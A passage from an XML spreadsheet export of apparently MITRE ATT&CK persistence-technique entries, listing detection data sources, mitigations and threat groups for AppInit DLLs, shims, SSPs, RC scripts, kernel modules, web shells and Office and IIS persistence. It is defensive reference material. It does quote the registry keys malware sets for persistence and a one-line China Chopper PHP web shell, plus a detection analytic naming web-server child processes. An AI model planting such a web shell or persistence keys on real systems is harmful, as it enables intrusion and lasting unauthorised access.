If a victim meets certain criteria, [T9000](https://attack.mitre.org/software/S0098) uses the AppInit_DLL functionality to achieve persistence by ensuring that every user mode process that is spawned will load its malicious DLL, ResN32.dll. It does this by creating the following Registry keys: &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs – %APPDATA%\Intel\ResN32.dll&lt;/code&gt; and &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs – 0x1&lt;/code&gt;.(Citation: Palo Alto T9000 Feb 2016)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for sdbinst.exe for potential indications of application shim abuse.
File Modification
Monitor for changes made to files that may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
Module Load
Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process.
Process Creation
Monitor newly executed processs for sdbinst.exe for potential indications of application shim abuse. 
There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):
* Shim-Process-Scanner - checks memory of every running process for any shim flags
* Shim-Detector-Lite - detects installation of custom shim databases
* Shim-Guard - monitors registry for any shim installations
* ShimScanner - forensic tool to find active shims in memory
* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)
Windows Registry Key Modification
Monitor for changes to windows registry keys and/or values that may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
Update Software
Microsoft released an optional patch update - KB3045645 - that will remove the "auto-elevate" flag within the sdbinst.exe. This will prevent use of application shimming to bypass UAC.
User Account Control
Changing UAC settings to "Always Notify" will give the user more visibility when UAC elevation is requested, however, this option will not be popular among users due to the constant UAC interruptions.
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has used application shim databases for persistence.(Citation: FireEye FIN7 Shim Databases)
Pillowmint
[Pillowmint](https://attack.mitre.org/software/S0517) has used a malicious shim database to maintain persistence.(Citation: Trustwave Pillowmint June 2020)
SDBbot
[SDBbot](https://attack.mitre.org/software/S0461) has the ability to use application shimming for persistence if it detects it is running as admin on Windows XP or 7, by creating a shim database to patch services.exe.(Citation: Proofpoint TA505 October 2019)
ShimRat
[ShimRat](https://attack.mitre.org/software/S0444) has installed shim databases in the &lt;code&gt;AppPatch&lt;/code&gt; folder.(Citation: FOX-IT May 2016 Mofang)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may abuse security support providers (SSPs) to execute DLLs when the system boots.
Module Load
Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)
Windows Registry Key Modification
Monitor the Registry for changes to the SSP Registry keys. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)
Privileged Process Integrity
Windows 8.1, Windows Server 2012 R2, and later versions may make LSA run as a Protected Process Light (PPL) by setting the Registry key &lt;code&gt;HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\RunAsPPL&lt;/code&gt;, which requires all SSP DLLs to be signed by Microsoft. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)
Empire
[Empire](https://attack.mitre.org/software/S0363) can enumerate Security Support Providers (SSPs) as well as utilize [PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Install-SSP&lt;/code&gt; and &lt;code&gt;Invoke-Mimikatz&lt;/code&gt; to install malicious SSPs and log authentication events.(Citation: Github PowerShell Empire)
Mimikatz
The [Mimikatz](https://attack.mitre.org/software/S0002) credential dumper contains an implementation of an SSP.(Citation: Deply Mimikatz)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Install-SSP&lt;/code&gt; Persistence module can be used to establish by installing a SSP DLL.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments resulting from RC scripts for unusual or unknown applications or behavior
File Creation
Monitor for newly constructed /etc/rc.local file 
File Modification
Monitor for changes made to files for unexpected modifications to RC scripts in the /etc/ directory
Process Creation
Monitor for newly constructed processes and/or command-lines that  execute /etc/rc.local if present.
Restrict File and Directory Permissions
Limit privileges of user accounts so only authorized users can edit the rc.common file.
APT29
[APT29](https://attack.mitre.org/groups/G0016) has installed a run command on a compromised system to enable malware execution on system startup.(Citation: Mandiant APT29 Eye Spy Email Nov 22)
Cyclops Blink
[Cyclops Blink](https://attack.mitre.org/software/S0687) has the ability to execute on device startup, using a modified RC script named S51armled.(Citation: NCSC Cyclops Blink February 2022)
Green Lambert
[Green Lambert](https://attack.mitre.org/software/S0690) can add &lt;code&gt;init.d&lt;/code&gt; and &lt;code&gt;rc.d&lt;/code&gt; files in the &lt;code&gt;/etc&lt;/code&gt; folder to establish persistence.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) 
HiddenWasp
[HiddenWasp](https://attack.mitre.org/software/S0394) installs reboot persistence by adding itself to &lt;code&gt;/etc/rc.local&lt;/code&gt;.(Citation: Intezer HiddenWasp Map 2019)
iKitten
[iKitten](https://attack.mitre.org/software/S0278) adds an entry to the rc.common file for persistence.(Citation: objsee mac malware 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: &lt;code&gt;modprobe&lt;/code&gt;, &lt;code&gt;insmod&lt;/code&gt;, &lt;code&gt;lsmod&lt;/code&gt;, &lt;code&gt;rmmod&lt;/code&gt;, or &lt;code&gt;modinfo&lt;/code&gt; (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package.
On macOS, monitor for execution of &lt;code&gt;kextload&lt;/code&gt; commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the &lt;code&gt;kext_policy&lt;/code&gt; table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, &lt;code&gt;/var/db/SystemPolicyConfiguration/KextPolicy&lt;/code&gt;.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
File Creation
Monitor for newly constructed files that may modify the kernel to automatically execute programs on system boot.
File Modification
Monitor for changes made to files that may modify the kernel to automatically execute programs on system boot.
Kernel Module Load
LKMs are typically loaded into &lt;code&gt;/lib/modules&lt;/code&gt; and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
Process Creation
Monitor for newly created processes that may modify the kernel to automatically execute programs on system boot.
Antivirus/Antimalware
Common tools for detecting Linux rootkits include: rkhunter (Citation: SourceForge rkhunter), chrootkit (Citation: Chkrootkit Main), although rootkits may be designed to evade certain detection tools.
Execution Prevention
Application control and software restriction tools, such as SELinux, KSPP, grsecurity MODHARDEN, and Linux kernel tuning can aid in restricting kernel module loading.(Citation: Kernel.org Restrict Kernel Module)(Citation: Wikibooks Grsecurity)(Citation: Kernel Self Protection Project)(Citation: Increasing Linux kernel integrity)(Citation: LKM loading kernel restrictions)
Privileged Account Management
Limit access to the root account and prevent users from loading kernel modules and extensions through proper privilege separation and limiting Privilege Escalation opportunities.
User Account Management
Use MDM to disable user's ability to install or approve kernel extensions, and ensure all approved kernel extensions are in alignment with policies specified in &lt;code&gt;com.apple.syspolicy.kernel-extension-policy&lt;/code&gt;.(Citation: Apple TN2459 Kernel Extensions)(Citation: MDMProfileConfigMacOS)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), attackers used a signed kernel rootkit to establish additional persistence.(Citation: Cybereason OperationCuckooBees May 2022)
Drovorub
[Drovorub](https://attack.mitre.org/software/S0502) can use kernel modules to establish persistence.(Citation: NSA/FBI Drovorub August 2020)
Skidmap
[Skidmap](https://attack.mitre.org/software/S0468) has the ability to install several loadable kernel modules (LKMs) on infected machines.(Citation: Trend Micro Skidmap)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may backdoor web servers with web shells to establish persistent access to systems. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)
File Creation
File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script.(Citation: NSA Cyber Mitigating Web Shells)
File Modification
Monitor for changes made to files that may backdoor web servers with web shells to establish persistent access to systems.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Process Creation
Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is very similar to the following short payload: (Citation: Lee 2013)
`&lt;?php @evaI($_P0ST['password']);&gt;`
Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as spawning cmd.exe or accessing files that are not in the Web directory.(Citation: NSA Cyber Mitigating Web Shells)
A web shell is a web script placed on an openly accessible web server to allow an adversary to use the server as a gatway in a network. As the shell operates, commands will be issued from within the web application into the broader server operating system. This analytic looks for host enumeration executables initiated by any web service that would not normally be executed within that environment.
&lt;h4&gt;Analytic 1 - Webshell-Indicative Process Tree&lt;/h4&gt;
&lt;code&gt;suspicious_processes = filter processes where (
  (parent_exe == "w3wp.exe" OR
   parent_exe == "httpd.exe" OR
   parent_exe == "tomcat*.exe" OR
   parent_exe == "nginx.exe" ) AND
  (exe == "cmd.exe" OR
   exe == "powershell.exe" OR
   exe == "net.exe" OR
   exe == "whoami.exe" OR
   exe == "hostname.exe" OR
   exe == "systeminfo.exe" OR
   exe == "ipconfig.exe) )&lt;/code&gt;
Disable or Remove Feature or Program
Consider disabling functions from web technologies such as PHP’s `evaI()` that may be abused for web shells.(Citation: ITSyndicate Disabling PHP functions)
User Account Management
Enforce the principle of least privilege by limiting privileges of user accounts so only authorized accounts can modify the web directory.(Citation: NSA and ASD Detect and Prevent Web Shells 2020)
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) deployed JScript web shells through the creation of malicious ViewState objects.(Citation: Mandiant APT41)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors generated a web shell within a vulnerable Enterprise Resource Planning Web Application Server as a persistence mechanism.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used their own web shells, as well as those previously placed on target systems by other threat actors, for reconnaissance and lateral movement.(Citation: FoxIT Wocao December 2019)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used a modified and obfuscated version of the reGeorg web shell to maintain persistence on a target's Outlook Web Access (OWA) server.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has installed web shells on exploited Microsoft Exchange servers.(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Mandiant APT29 Eye Spy Email Nov 22)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has used Web shells to maintain access to victim websites.(Citation: Volexity OceanLotus Nov 2017)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has used web shells for persistence or to ensure redundant access.(Citation: CISA AA20-239A BeagleBoyz August 2020)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has installed ANTAK and ASPXSPY web shells.(Citation: FireEye APT39 Jan 2019)
BackdoorDiplomacy
[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has used web shells to establish an initial foothold and for lateral movement within a victim's system.(Citation: ESET BackdoorDiplomacy Jun 2021)
Deep Panda
[Deep Panda](https://attack.mitre.org/groups/G0009) uses Web shells on publicly accessible Web servers to access victim networks.(Citation: CrowdStrike Deep Panda Web Shells)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has commonly created Web shells on victims' publicly accessible email and web servers, which they used to maintain access to a victim network and download additional malicious files.(Citation: US-CERT TA18-074A)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has utilized obfuscated and open-source web shells such as JspSpy, reGeorg, MiniWebCmdShell, and Vonloesch Jsp File Browser 1.2 to enable remote code execution and to execute commands on compromised web server.(Citation: Sygnia Elephant Beetle Jan 2022)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has installed web shells on compromised hosts to maintain access.(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: ClearSky Pay2Kitten December 2020)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) used Web shells to persist in victim environments and assist in execution and exfiltration.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has deployed multiple web shells on compromised servers including SIMPLESEESHARP, SPORTSBALL, [China Chopper](https://attack.mitre.org/software/S0020), and [ASPXSpy](https://attack.mitre.org/software/S0073).(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)(Citation: FireEye Exchange Zero Days March 2021)(Citation: Tarrask scheduled task)(Citation: Rapid7 HAFNIUM Mar 2021)   
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used modified versions of open source PHP web shells to maintain access, often adding "Dinosaur" references within the code.(Citation: CISA AA20-301A Kimsuky)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) relies on web shells for an initial foothold as well as persistence into the victim's systems.(Citation: FireEye APT40 March 2019)(Citation: CISA AA21-200A APT40 July 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used multiple web shells to gain execution.(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)
Moses Staff
[Moses Staff](https://attack.mitre.org/groups/G1009) has dropped a web shell onto a compromised system.(Citation: Checkpoint MosesStaff Nov 2021)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used web shells, often to maintain access to a victim network.(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: Crowdstrike GTR2020 Mar 2020)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used webshells including [P.A.S. Webshell](https://attack.mitre.org/software/S0598) to maintain access to victim networks.(Citation: ANSSI Sandworm January 2021)
TEMP.Veles
[TEMP.Veles](https://attack.mitre.org/groups/G0088) has planted Web shells on Outlook Exchange servers.(Citation: FireEye TRITON 2019)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used a variety of Web shells.(Citation: Unit42 Emissary Panda May 2019)
Tonto Team
[Tonto Team](https://attack.mitre.org/groups/G0131) has used a first stage web shell after compromising a vulnerable Exchange server.(Citation: ESET Exchange Mar 2021)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has started a web service in the target host and wait for the adversary to connect, acting as a web shell.(Citation: TrendMicro Tropic Trooper May 2020)	
Volatile Cedar
[Volatile Cedar](https://attack.mitre.org/groups/G0123) can inject web shell code into a server.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021) 
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used webshells, including ones named AuditReport.jspx and iisstart.aspx, in compromised environments.(Citation: Secureworks BRONZE SILHOUETTE May 2023)
ASPXSpy
[ASPXSpy](https://attack.mitre.org/software/S0073) is a Web shell. The ASPXTool version used by [Threat Group-3390](https://attack.mitre.org/groups/G0027) has been deployed to accessible servers running Internet Information Services (IIS).(Citation: Dell TG-3390)
China Chopper
[China Chopper](https://attack.mitre.org/software/S0020)'s server component is a Web Shell payload.(Citation: Lee 2013)
OwaAuth
[OwaAuth](https://attack.mitre.org/software/S0072) is a Web shell that appears to be exclusively used by [Threat Group-3390](https://attack.mitre.org/groups/G0027). It is installed as an ISAPI filter on Exchange servers and shares characteristics with the [China Chopper](https://attack.mitre.org/software/S0020) Web shell.(Citation: Dell TG-3390)
P.A.S. Webshell
[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can gain remote access and execution on target web servers.(Citation: ANSSI Sandworm January 2021)
SEASHARPEE
[SEASHARPEE](https://attack.mitre.org/software/S0185) is a Web shell.(Citation: FireEye APT34 Webinar Dec 2017)
SUPERNOVA
[SUPERNOVA](https://attack.mitre.org/software/S0578) is a Web shell.(Citation: Unit42 SUPERNOVA Dec 2020)(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: CISA Supernova Jan 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system.
File Creation
Monitor for newly constructed files that may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system.
File Modification
Monitor for changes made to files that may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system.
Module Load
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
Process Creation
Monitor newly executed processes that may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system.
Windows Registry Key Creation
Monitor for the creation of the Office Test Registry key. Collect events related to Registry key creation for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)
Windows Registry Key Modification
Monitor for changes made to the Office Test Registry key. Collect events related to Registry key modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent Office applications from creating child processes and from writing potentially malicious executable content to disk. (Citation: win10_asr)
Software Configuration
Create the Registry key used to execute it and set the permissions to "Read Control" to prevent easy access to the key without administrator permissions or requiring Privilege Escalation.(Citation: Palo Alto Office Test Sofacy)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used the Office Test persistence mechanism within Microsoft Office by adding the Registry key &lt;code&gt;HKCU\Software\Microsoft\Office test\Special\Perf&lt;/code&gt; to execute code.(Citation: Palo Alto Office Test Sofacy)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Command Execution
Monitor executed commands and arguments that may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms)
Process Creation
Monitor newly executed processes that may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system.
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent Office applications from creating child processes and from writing potentially malicious executable content to disk. (Citation: win10_asr)
Update Software
For the Outlook methods, blocking macros may be ineffective as the Visual Basic engine used for these features is separate from the macro scripting engine.(Citation: SensePost Outlook Forms) Microsoft has released patches to try to address each issue. Ensure KB3191938 which blocks Outlook Visual Basic and displays a malicious code warning, KB4011091 which disables custom forms by default, and KB4011162 which removes the legacy Home Page feature, are applied to systems.(Citation: SensePost Outlook Home Page)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has abused the Outlook Home Page feature for persistence. [OilRig](https://attack.mitre.org/groups/G0049) has also used CVE-2017-11774 to roll back the initial patch designed to protect against Home Page abuse.(Citation: FireEye Outlook Dec 2019)
Ruler
[Ruler](https://attack.mitre.org/software/S0358) can be used to automate the abuse of Outlook Home Pages to establish persistence.(Citation: SensePost Ruler GitHub) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may abuse Microsoft Office templates to obtain persistence on a compromised system.
File Creation
Monitor for newly constructed files that may abuse Microsoft Office templates to obtain persistence on a compromised system.
File Modification
Monitor for changes made to files that may abuse Microsoft Office templates to obtain persistence on a compromised system. Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated
Process Creation
Monitor newly executed processes that may abuse Microsoft Office templates to obtain persistence on a compromised system.
Windows Registry Key Creation
Collect events related to Registry key creation for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
Windows Registry Key Modification
Collect events related to Registry key modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent Office applications from creating child processes and from writing potentially malicious executable content to disk. (Citation: win10_asr)
Disable or Remove Feature or Program
Follow Office macro security best practices suitable for your environment. Disable Office VBA macros from executing.
Disable Office add-ins. If they are required, follow best practices for securing them by requiring them to be signed and disabling user notification for allowing add-ins. For some add-ins types (WLL, VBA) additional mitigation is likely required as disabling add-ins in the Office Trust Center does not disable WLL nor does it prevent VBA code from executing. (Citation: MRWLabs Office Persistence Add-ins)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used a Word Template, Normal.dotm, for persistence.(Citation: Reaqta MuddyWater November 2017)
BackConfig
[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use hidden columns in Excel spreadsheets to store executable files or commands for VBA macros.(Citation: Unit 42 BackConfig May 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to use an Excel Workbook to execute additional code by enabling Office to trust macros and execute code without user permission.(Citation: Talos Cobalt Strike September 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may leverage Microsoft Office-based applications for persistence between startups. SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Command Execution
Monitor executed commands and arguments that may leverage Microsoft Office-based applications for persistence between startups. Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
File Creation
Monitor for newly constructed files that may leverage Microsoft Office-based applications for persistence between startups.
File Modification
Monitor for changes made to files that may leverage Microsoft Office-based applications for persistence between startups.
Module Load
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
Process Creation
Monitor newly executed processes that may leverage Microsoft Office-based applications for persistence between startups. Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
Windows Registry Key Creation
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persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
Windows Registry Key Modification
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persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent Office applications from creating child processes and from writing potentially malicious executable content to disk. (Citation: win10_asr)
Disable or Remove Feature or Program
Follow Office macro security best practices suitable for your environment. Disable Office VBA macros from executing.
Disable Office add-ins. If they are required, follow best practices for securing them by requiring them to be signed and disabling user notification for allowing add-ins. For some add-ins types (WLL, VBA) additional mitigation is likely required as disabling add-ins in the Office Trust Center does not disable WLL nor does it prevent VBA code from executing. (Citation: MRWLabs Office Persistence Add-ins)
Software Configuration
For the Office Test method, create the Registry key used to execute it and set the permissions to "Read Control" to prevent easy access to the key without administrator permissions or requiring Privilege Escalation. (Citation: Palo Alto Office Test Sofacy)
Update Software
For the Outlook methods, blocking macros may be ineffective as the Visual Basic engine used for these features is separate from the macro scripting engine.(Citation: SensePost Outlook Forms) Microsoft has released patches to try to address each issue. Ensure KB3191938 which blocks Outlook Visual Basic and displays a malicious code warning, KB4011091 which disables custom forms by default, and KB4011162 which removes the legacy Home Page feature, are applied to systems.(Citation: SensePost Outlook Home Page)
APT32
[APT32](https://attack.mitre.org/groups/G0050) have replaced Microsoft Outlook's VbaProject.OTM file to install a backdoor macro for persistence.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has inserted malicious macros into existing documents, providing persistence when they are reopened. [Gamaredon Group](https://attack.mitre.org/groups/G0047) has loaded the group's previously delivered VBA project by relaunching Microsoft Outlook with the &lt;code&gt;/altvba&lt;/code&gt; option, once the Application.Startup event is received.(Citation: ESET Gamaredon June 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may abuse legitimate extensible development features of servers to establish persistent access to systems. Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)
File Creation
Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.
File Modification
Monitor for changes made to files that may abuse legitimate extensible development features of servers to establish persistent access to systems.
Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic,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(Citation: US-CERT Alert TA15-314A Web Shells)
Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
Process Creation
Process monitoring may be used to detect servers components that perform suspicious actions such as running cmd.exe or accessing files.
Audit
Regularly check component software on critical services that adversaries may target for persistence to verify the integrity of the systems and identify if unexpected changes have been made.
Code Signing
Ensure all application component binaries are signed by the correct application developers.
Disable or Remove Feature or Program
Consider disabling software components from servers when possible to prevent abuse by adversaries.(Citation: ITSyndicate Disabling PHP functions)
Privileged Account Management
Do not allow administrator accounts that have permissions to add component software on these services to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.
Restrict Registry Permissions
Consider using Group Policy to configure and block modifications to service and other critical server parameters in the Registry.(Citation: Microsoft System Services Fundamentals)
User Account Management
Enforce the principle of least privilege by limiting privileges of user accounts so only authorized accounts can modify and/or add server software components.(Citation: NSA and ASD Detect and Prevent Web Shells 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor execution and command-line arguments of &lt;code&gt;AppCmd.exe&lt;/code&gt;, which may be abused to install malicious IIS modules.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Unit 42 RGDoor Jan 2018)(Citation: ESET IIS Malware 2021)
File Creation
Monitor for creation of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules.
File Modification
Monitor for modification of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules. Changes to &lt;code&gt;%windir%\system32\inetsrv\config\applicationhost.config&lt;/code&gt; could indicate an IIS module installation.(Citation: Microsoft IIS Modules Overview 2007)(Citation: ESET IIS Malware 2021)
Audit
Regularly check installed IIS components to verify the integrity of the web server and identify if unexpected changes have been made.
Code Signing
Ensure IIS DLLs and binaries are signed by the correct application developers.
Execution Prevention
Restrict unallowed ISAPI extensions and filters from running by specifying a list of ISAPI extensions and filters that can run on IIS.(Citation: Microsoft ISAPICGIRestriction 2016)
Privileged Account Management
Do not allow administrator accounts that have permissions to add IIS components to be used for day-to-day operations that may expose these permissions to potential adversaries and/or other unprivileged systems.
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) targeted Windows servers running Internet Information Systems (IIS) to install C2 components.(Citation: McAfee Lazarus Jul 2020)
IceApple
[IceApple](https://attack.mitre.org/software/S1022) is an IIS post-exploitation framework, consisting of 18 modules that provide several functionalities.(Citation: CrowdStrike IceApple May 2022)
OwaAuth
[OwaAuth](https://attack.mitre.org/software/S0072) has been loaded onto Exchange servers and disguised as an ISAPI filter (owaauth.dll). The IIS w3wp.exe process then loads the malicious DLL.(Citation: Dell TG-3390)
RGDoor
[RGDoor](https://attack.mitre.org/software/S0258) establishes persistence on webservers as an IIS module.(Citation: Unit 42 RGDoor Jan 2018)(Citation: ESET IIS Malware 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may abuse Microsoft Office add-ins to obtain persistence on a compromised system. 
File Creation
Monitor for newly constructed files that may abuse Microsoft Office add-ins to obtain persistence on a compromised system.
File Modification
Monitor for changes made to files that may abuse Microsoft Office add-ins to obtain persistence on a compromised system.
Process Creation
Monitor newly executed processes that may abuse Microsoft Office add-ins to obtain persistence on a compromised system. 
Windows Registry Key Creation
